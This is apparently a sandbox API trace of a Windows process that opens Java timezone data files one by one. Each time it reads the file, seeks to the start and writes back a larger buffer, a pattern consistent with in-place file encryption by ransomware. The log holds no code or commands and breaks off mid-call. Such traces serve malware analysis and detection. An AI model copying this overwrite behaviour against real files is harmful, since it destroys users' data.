[0141.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Athens", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0141.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Athens", cchWideChar=6, lpMultiByteStr=0x1f7ad2c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Athens", lpUsedDefaultChar=0x0) returned 6 [0141.122] ReadFile (in: hFile=0x1dc, lpBuffer=0x286cf78, nNumberOfBytesToRead=0x4ac, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesRead=0x359f2bc*=0x4ac, lpOverlapped=0x0) returned 1 [0141.164] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0141.164] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x359f2d0*=0xa34, lpOverlapped=0x0) returned 1 [0141.164] CloseHandle (hObject=0x1dc) returned 1 [0141.165] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Dublin" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\dublin"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0141.207] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0141.207] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x77c [0141.207] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0141.207] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.207] ReleaseMutex (hMutex=0x168) returned 1 [0141.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dublin", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0141.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dublin", cchWideChar=6, lpMultiByteStr=0x1f7ad2c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dublin", lpUsedDefaultChar=0x0) returned 6 [0141.207] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a3b68, nNumberOfBytesToRead=0x77c, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesRead=0x359f2bc*=0x77c, lpOverlapped=0x0) returned 1 [0141.210] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0141.210] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0xd04, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x359f2d0*=0xd04, lpOverlapped=0x0) returned 1 [0141.221] CloseHandle (hObject=0x1d4) returned 1 [0141.222] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Luxembourg" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\luxembourg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0141.222] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0141.222] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x620 [0141.222] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0141.222] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.222] ReleaseMutex (hMutex=0x168) returned 1 [0141.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Luxembourg", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0141.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Luxembourg", cchWideChar=10, lpMultiByteStr=0x1f7340c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Luxembourg", lpUsedDefaultChar=0x0) returned 10 [0141.222] ReadFile (in: hFile=0x1d4, lpBuffer=0x26cf048, nNumberOfBytesToRead=0x620, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesRead=0x359f2bc*=0x620, lpOverlapped=0x0) returned 1 [0141.230] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0141.230] WriteFile (in: hFile=0x1d4, lpBuffer=0x2870fb8*, nNumberOfBytesToWrite=0xba8, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2870fb8*, lpNumberOfBytesWritten=0x359f2d0*=0xba8, lpOverlapped=0x0) returned 1 [0141.230] CloseHandle (hObject=0x1d4) returned 1 [0141.230] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Prague" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\prague"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0141.231] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0141.231] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x4c0 [0141.231] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0141.231] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.231] ReleaseMutex (hMutex=0x168) returned 1 [0141.231] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Prague", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0141.231] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Prague", cchWideChar=6, lpMultiByteStr=0x1f7ad2c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Prague", lpUsedDefaultChar=0x0) returned 6 [0141.231] ReadFile (in: hFile=0x1d4, lpBuffer=0x286cf78, nNumberOfBytesToRead=0x4c0, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesRead=0x359f2bc*=0x4c0, lpOverlapped=0x0) returned 1 [0141.252] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0141.253] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0xa48, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x359f2d0*=0xa48, lpOverlapped=0x0) returned 1 [0141.253] CloseHandle (hObject=0x1d4) returned 1 [0141.253] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Tirane" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\tirane"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0141.254] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0141.254] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x48c [0141.254] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0141.254] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.254] ReleaseMutex (hMutex=0x168) returned 1 [0141.255] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tirane", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0141.255] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tirane", cchWideChar=6, lpMultiByteStr=0x1f7ad2c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Tirane", lpUsedDefaultChar=0x0) returned 6 [0141.255] ReadFile (in: hFile=0x1d4, lpBuffer=0x286cf78, nNumberOfBytesToRead=0x48c, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesRead=0x359f2bc*=0x48c, lpOverlapped=0x0) returned 1 [0141.271] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0141.272] WriteFile (in: hFile=0x1d4, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0xa14, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x359f2d0*=0xa14, lpOverlapped=0x0) returned 1 [0141.272] CloseHandle (hObject=0x1d4) returned 1 [0141.272] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Zurich" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\zurich"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0141.273] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0141.273] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x410 [0141.273] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0141.273] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.273] ReleaseMutex (hMutex=0x168) returned 1 [0141.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Zurich", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0141.274] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Zurich", cchWideChar=6, lpMultiByteStr=0x1f7ad2c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Zurich", lpUsedDefaultChar=0x0) returned 6 [0141.274] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e99938, nNumberOfBytesToRead=0x410, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e99938*, lpNumberOfBytesRead=0x359f2bc*=0x410, lpOverlapped=0x0) returned 1 [0141.898] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0141.898] WriteFile (in: hFile=0x1d4, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x998, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x359f2d0*=0x998, lpOverlapped=0x0) returned 1 [0141.898] CloseHandle (hObject=0x1d4) returned 1 [0141.898] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Kerguelen" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\kerguelen"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0141.899] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0141.899] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x41 [0141.899] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0141.899] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.899] ReleaseMutex (hMutex=0x168) returned 1 [0141.899] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Kerguelen", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0141.899] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Kerguelen", cchWideChar=9, lpMultiByteStr=0x1f7344c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Kerguelen", lpUsedDefaultChar=0x0) returned 9 [0141.899] ReadFile (in: hFile=0x1d4, lpBuffer=0x1fc1f08, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc1f08*, lpNumberOfBytesRead=0x359f2bc*=0x41, lpOverlapped=0x0) returned 1 [0141.900] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0141.900] WriteFile (in: hFile=0x1d4, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x359f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0141.901] CloseHandle (hObject=0x1d4) returned 1 [0141.901] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\MST7MDT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\mst7mdt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0141.901] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0141.902] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x4f8 [0141.902] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0141.902] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.902] ReleaseMutex (hMutex=0x168) returned 1 [0141.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MST7MDT", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0141.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MST7MDT", cchWideChar=7, lpMultiByteStr=0x1f7ad2c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MST7MDT", lpUsedDefaultChar=0x0) returned 7 [0141.902] ReadFile (in: hFile=0x1d4, lpBuffer=0x1f3ee68, nNumberOfBytesToRead=0x4f8, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f3ee68*, lpNumberOfBytesRead=0x359f2bc*=0x4f8, lpOverlapped=0x0) returned 1 [0141.904] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0141.904] WriteFile (in: hFile=0x1d4, lpBuffer=0x2870fb8*, nNumberOfBytesToWrite=0xa80, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2870fb8*, lpNumberOfBytesWritten=0x359f2d0*=0xa80, lpOverlapped=0x0) returned 1 [0141.904] CloseHandle (hObject=0x1d4) returned 1 [0141.905] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Fakaofo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\fakaofo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0154.502] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0154.502] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x4d [0154.502] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0154.502] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0154.503] ReleaseMutex (hMutex=0x168) returned 1 [0154.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Fakaofo", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0154.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Fakaofo", cchWideChar=7, lpMultiByteStr=0x1f7ad2c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Fakaofo", lpUsedDefaultChar=0x0) returned 7 [0154.503] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f9fca8, nNumberOfBytesToRead=0x4d, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f9fca8*, lpNumberOfBytesRead=0x359f2bc*=0x4d, lpOverlapped=0x0) returned 1 [0154.735] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0154.735] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5d5, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x359f2d0*=0x5d5, lpOverlapped=0x0) returned 1 [0154.736] CloseHandle (hObject=0x1d8) returned 1 [0154.739] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Johnston" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\johnston"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0154.827] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0154.827] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1b [0154.828] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0154.828] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0154.828] ReleaseMutex (hMutex=0x168) returned 1 [0154.828] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Johnston", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0154.828] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Johnston", cchWideChar=8, lpMultiByteStr=0x1f735ec, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Johnston", lpUsedDefaultChar=0x0) returned 8 [0154.828] ReadFile (in: hFile=0x1e4, lpBuffer=0x1f88bc8, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88bc8*, lpNumberOfBytesRead=0x359f2bc*=0x1b, lpOverlapped=0x0) returned 1 [0154.829] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0154.829] WriteFile (in: hFile=0x1e4, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x359f2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0154.830] CloseHandle (hObject=0x1e4) returned 1 [0154.830] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Niue" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\niue"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0154.831] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0154.831] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x59 [0154.831] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0154.831] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0154.831] ReleaseMutex (hMutex=0x168) returned 1 [0154.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Niue", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0154.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Niue", cchWideChar=4, lpMultiByteStr=0x1f7ad2c, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Niue", lpUsedDefaultChar=0x0) returned 4 [0154.831] ReadFile (in: hFile=0x1e4, lpBuffer=0x1fbad70, nNumberOfBytesToRead=0x59, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fbad70*, lpNumberOfBytesRead=0x359f2bc*=0x59, lpOverlapped=0x0) returned 1 [0154.832] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0154.833] WriteFile (in: hFile=0x1e4, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5e1, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x359f2d0*=0x5e1, lpOverlapped=0x0) returned 1 [0154.833] CloseHandle (hObject=0x1e4) returned 1 [0154.833] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Rarotonga" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\rarotonga"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0154.834] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0154.834] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x11d [0154.834] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0154.834] WaitForSingleObject (hHandle=0x168, 